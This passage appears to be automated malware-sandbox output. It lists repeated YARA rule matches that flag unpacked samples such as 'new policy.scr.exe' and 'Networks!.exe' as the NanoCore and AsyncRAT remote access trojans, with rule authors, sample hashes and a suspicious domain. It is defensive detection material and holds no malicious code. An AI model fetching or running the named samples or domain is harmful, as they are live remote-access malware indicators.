Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
